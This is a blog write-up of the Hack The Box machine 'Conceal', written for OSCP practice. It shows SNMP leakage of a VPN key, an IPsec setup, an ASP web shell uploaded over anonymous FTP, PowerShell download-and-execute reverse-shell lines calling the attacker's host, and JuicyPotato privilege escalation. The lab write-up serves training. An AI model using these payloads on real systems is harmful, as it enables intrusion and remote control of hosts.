Hack The Box: Conceal Write-up (#40)

This is my 40th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomater 10.10.10.116 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get the back the following result:

Running all scans on 10.10.10.116


---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 00:58 +08
root@kali:/htb/Conceal# bash /opt/nmapAutomator/nmapAutomator.sh 10.10.10.116 AllRunning all scans on 10.10.10.116

Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 00:59 +08
Nmap done: 1 IP address (1 host up) scanned in 102.40 second
---------------------Starting Nmap Basic Scan---------------------

No ports in quick scan.. Skipping!

----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 01:01 +08
Nmap scan report for 10.10.10.116
Host is up (0.012s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
500/udp open isakmp
Nmap done: 1 IP address (1 host up) scanned in 194.21 secondsMaking a script scan on UDP ports: 500

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 01:04 +08
Nmap scan report for 10.10.10.116
Host is up.
PORT STATE SERVICE VERSION
500/udp open|filtered isakmp
|_ike-version: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.31 seconds
...

We have one open UDP port.

  • Port 500: — Running isakmp.

Before we begin enumeration, let’s make quick mental notes about the scan results.

  1. A quick Google search for isakmp service tells that the Internet Security Association and Key Management Protocol (ISAKMP) is a protocol for establishing Security association (SA) and cryptographic keys in an Internet environment. IKE is a type of ISAKMP implementation. This protocol together with IPsec is for a secure VPN connection.
  2. There must be a key to authenticate to establish a VPN connection through these protocols. Since we have only UDP port respond to our Nmap scan, let’s rerun another full UDP scan to see if we missed any ports in the first scan.

Rerun the UDP scan give us an extra port.

root@kali:/htb/Conceal# nmap -vvv -sU -sV 10.10.10.116
...
Discovered open port 161/udp on 10.10.10.116

Port 161 is open. This normally runs SNMP service.

Service Enumeration

Port 161 (SNMP)

Let’s run Nmap scan for this port to see if it gives any interesting info.

nmap -sU -sC -sV -p 161 10.10.10.116
  • -sU: UDP scan
  • -p: Port
  • -sC: Run default scripts
  • -sV: Version Detection

We get back the following results.

From the above results, SNMP version 1 is running and the query was performed using default “public” community string. It also returned many ports open including FTP, HTTP, SMB and NTP. To get access to these ports, we need to establish a secure connection.

Let’s run snmpwalk to query SNMP for more information.

snmpwalk -v1 -c public 10.10.10.116
  • -v: SNMP version
  • -c: community string

We get back the following results.

root@kali:/htb/Conceal# cat snmpwalk.txt 
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (1177748) 3:16:17.48
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
...

The interesting part of the result is, it leaks the IKE VPN password hash. Let’s crack it using CrackStation.

We have the plaintext password. Let’s use it to try establishing a connection to the VPN.

Before doing that, find a valid transformation using ike-scan, so the server will talk to you.

ike-scan -M 10.10.10.116
  • -M: Multiline

We get back the following results.

As you can see, there is a field called AUTH with the value PSK. This means that the VPN is configured using a preshared key (and this is good for a pentester). The value of the last line is also very important:

  • 1 returned handshake; 0 returned notify: This means the target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable (a valid transform will be shown in the output).

Next, we’ll use strongswan to establish the IPsec connection.

Install strongswan.

apt install strongswan

We need to make changes to two files: ipsec.secrets and ipsec.conf.

In the /etc/ipsec.secrets add the following entry.

10.10.14.31 10.10.10.116 : PSK "Dudecake1!"

In the /etc/ipsec.conf add the following entry.

conn conceal
authby=secret
auto=route
keyexchange=ikev1
ike=3des-sha1-modp1024
left=10.10.14.31
right=10.10.10.116
type=transport
esp=3des-sha1
rightprotocol=tcp

Next, run the following command to establish the connection.

root@kali:/htb/Conceal# ipsec stop
Stopping strongSwan IPsec...
root@kali:/htb/Conceal# ipsec start
Starting strongSwan 5.8.4 IPsec [starter]...
root@kali:/htb/Conceal# ipsec up conceal
initiating Main Mode IKE_SA conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.14.31[500] to 10.10.10.116[500] (236 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.31[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.14.31[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.31[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.14.31[500] to 10.10.10.116[500] (100 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.31[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA conceal[1] established between 10.10.14.31[10.10.14.31]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 10032s
maximum IKE_SA lifetime 10572s
generating QUICK_MODE request 4150279273 [ HASH SA No ID ID ]
sending packet: from 10.10.14.31[500] to 10.10.10.116[500] (196 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.31[500] (188 bytes)
parsed QUICK_MODE response 4150279273 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
CHILD_SA conceal{2} established with SPIs cc0f2f64_i 9b6b47b0_o and TS 10.10.14.31/32 === 10.10.10.116/32[tcp]
generating QUICK_MODE request 4150279273 [ HASH ]
connection 'conceal' established successfully

Nice! The connection is established successfully. For some reason, Nmap scan failed with TCP SYN scan. So I run Nmap scan with TCP CONNECT.

nmap -sT -sC -sV -oA conceal 10.10.10.116

We get back the following results.

Nmap scan report for 10.10.10.116
Host is up (0.0087s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-12T20:58:22
|_ start_date: 2020-09-12T16:59:08
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.43 seconds

Service Enumeration (IPsec Connection)

Let’s begin with port 80.

Port 80 (HTTP)

Visit the index page.

Just default IIS page. Check the page source.

Nope, we have nothing useful here.

Next, run the gobuster scan.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.116 -t 50 -o gobuster.txt

We get back the following results.

...
/upload (Status: 301)
/Upload (Status: 301)

Visit the /upload path.

If there is any way we can upload file to this upload directory we can upload a reverse shell and obtain our initial foothold.

Port 21 (FTP)

The Nmap scan results showed anonymous access is allowed.

root@kali:/htb/Conceal# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>

Let’s test if we’re allowed to upload files. Create a test.txt file from Kali Linux.

echo "Test upload" > test.txt

Upload the test.txt file on the FTP server.

ftp> put test.txt 
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
13 bytes sent in 0.00 secs (235.0984 kB/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
09-12-20 10:31PM 13 test.txt
226 Transfer complete.

The upload was successful. Let’s see if we can call this file from /upload directory from the browser.

Great! We can call it. Nmap scan showed that IIS 10 is running, so it should able to execute ASP and ASPX code. Let’s test upload files with ASP and ASPX file extensions. Create a test.asp and test.aspx file and upload on the FTP server. Then call both files from the /upload directory.

Click on both files. test.aspx return status code 403 with the message “… extension configuration.”.

But test.asp allowed to upload and called. Let’s turn this into code execution.

Create a file shell.asp with the following contents.

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami && cmd /c systeminfo")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Then upload shell.asp on the FTP server and call it from the /upload directory.

Great! we get a rce. The IIS service is running in the context of conceal\destitute. Target machine OS is Windows 10 Enterprise edition and it is x64-bit architecture. Let’s prepare for a reverse shell.

Exploitation

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with the Kali Linux machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 53

When called, this sends a reverse shell back to our Kali Linux machine on port 53.

Set up a Netcat listener on Kali Linux.

nc -nlvp 53

Next, change the code in shell.asp to download and execute the PowerShell script.

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.31/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Set up a simple python web server.

python3 -m http.server 80

Upload the shell.asp file on the FTP server and call it from the browser.

We get a shell! Grab the user flag.

Post-Exploitation Enumeration

Let’s check the privilege of the user with the following command.

whoami /priv

We get back the following results.

Destitute has SeImpersonatePrivilege privilege is set to enabled. This is good. We can use the token impersonation technique to escalate privilege to SYSTEM using an automated tool called JuicyPotato.

Privilege Escalation

Download JuicyPotato.exe x64-bit binary file from here in place in your current working directory.

Copy the Invoke-PowerShellTcp.ps1 to your working directory again and rename it as shell2.ps1.

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell2.ps1

Add the following line to the end of the script with the Kali Linux machine configuration.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 443

When called, this sends a reverse shell back to our Kali Linux machine on port 443.

Next, create a shell.bat file that downloads the above shell2.ps1 PowerShell script and execute it in the target machine.

powershell -c iex(new-object 
net.webclient).downloadstring('http://10.10.14.31/
shell2.ps1')

Next, download the shell.bat file on the target machine.

(new-object net.webclient).downloadfile('http://10.10.14.31/
shell.bat', 'C:\Users\Destitute\Desktop\shell.bat')

Set up a listener on the attack machine to receive the reverse shell.

nc -nlvp 443

Get your CSLID for Windows 10 Enterprise from here.

Run the JuicyPotato executable as below.

./JuicyPotato.exe -p shell.bat -l 1337 -t  * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"

We get a shell back with SYSTEM privileges!

Grab the root flag.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Chatterbox.

--

--

--

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Take a TCP Dump in Windows

Bulletproofs pre-release

Fast, cheap and globally accessible Bazel remote cache on Google Cloud Run & Storage

bazel-cache service running in Cloud Run

ZFS Migration made easy…(Part 2 )

Stop coding CRUDs! How to develop in Spring Boot faster

The Ultimate Guide to Migrating to the Cloud with Serverless

Coding philosophy (part 4) — the code omniscient

How to use automatic hostname resolution in Laravel Homestead

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

More from Medium

CTFSGCTF 2022 Write-ups

Buffer overflow using Immunity Debugger

🐱‍💻 The eWPT Review🔍

RCE on micro_httpd web server